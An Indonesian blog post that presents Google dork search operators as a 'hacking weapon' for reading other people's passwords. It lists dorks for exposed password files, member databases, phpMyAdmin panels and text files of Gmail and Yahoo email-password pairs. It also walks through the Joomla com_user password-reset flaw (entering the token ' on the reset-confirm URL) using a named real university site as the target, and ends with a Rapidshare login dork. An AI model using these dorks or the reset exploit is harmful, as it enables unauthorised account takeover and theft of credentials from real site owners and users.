"kawasan wajib belajar,"
saya bukan orang pintar, karena orang pintar dulunya bodoh, saya adalah orang bodoh yang ingin belajar.

Memanfaatkan Google Dork Sebagai Senjata Hacking

Label:
بسم الله الرحمن الرحيم


Author : Rascal_21

Google dork sebagai senjata hacking

Banyak pencarian yang kita inginkan pada search engines tidak seperti yang diharapkan, mengapa? karena keyword yang anda masukan kurang sesuai dengan keyword-keyword yang tersimpan di mesin search engines.

Sehingga untuk mempermudahnya Google menyediakan fasilitas-fasilitas (dork), untuk mempermudahkan suatu pencarian, bahkan kita juga dapat melakukan hacking (melihat password) account orang lain yang terindex oleh google.



Pengenalan tentang google dorks :
Type-type dalam penggunaannya ada beberapa macam diantaranya:

intitle
allintitle
(Mencari judul/title pada suatu web)

inurl
allinurl
(Mencari suatu string yang terdapat pada url)

filetype

(Mencari suatu file secara lebih spesifik)
(www.google.c.id/help/faq_filetypes.html)

allintext
(Mencari suatu nilai string dalam suatu web)

site
(Mencari pada web tertentu)

link
(Mencari web2 yang mempunyai link pada web yang di pilih)

contoh dalam pengguunaannya:

Apabila kita ingin mencari sebuah lagu dari avenged maka kita ketikan sja di google seperti ini
intitle:"index of/avenged" dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.

Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), llu ketikan kata aveng*d agar google mencari database file tentg kata-kata aveng*d

Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini
intitle:"index of" "skripsi" site:.ac.id
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id

dan ini contoh2 lain dalam penggunaan google dork
inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:id filetype:.doc

sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confirm
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user

ketikan di google >>>>>>>> inurl:"option=com_user"
dan akan terlihat hasilnya, kita ambil contoh pada web indonesia saja,

http://www.lbifib.ui.ac.id/index.php?option=com_user&view=login

lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi

http://www.lbifib.ui.ac.id/index.php?option=com_user&view=reset&layout=confirm

lalu ketikan token '
dan apa hasilnya, password sudah bisa kita reset ulang,,,,

sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.

Dork Email

filetype:txt @yahoo.com password:*
filetype:txt @ymail.com password:***
filetype:txt @yahoo.com password:***
filetype:txt @gmail.com password:*
filetype:txt @gmail.com password:*
filetype:txt email + password:* @gmail.com @yahoo.com

Dork Rapidshare

Expiration-date:*2010 +login: rapidshare.com

Note : Date nya tinggal ganti sesuka kita, mau di ubah ke 2011- 2012- 2013. Etc

Sukron sudah mau membaca....jazakaAllah aufaru jaza'
0 komentar:

Posting Komentar

Related Posts Plugin for WordPress, Blogger...

Terbaru


Who am I.....

Foto saya
alhamdulillah, I am just a few people who can feel studying at high school then more of my friend can't feel it....
free counters

Followers

Text Backlink Exchanges Web Link Exchange Text Back Link Exchange Text Backlink Exchanges Text Back Links Exchanges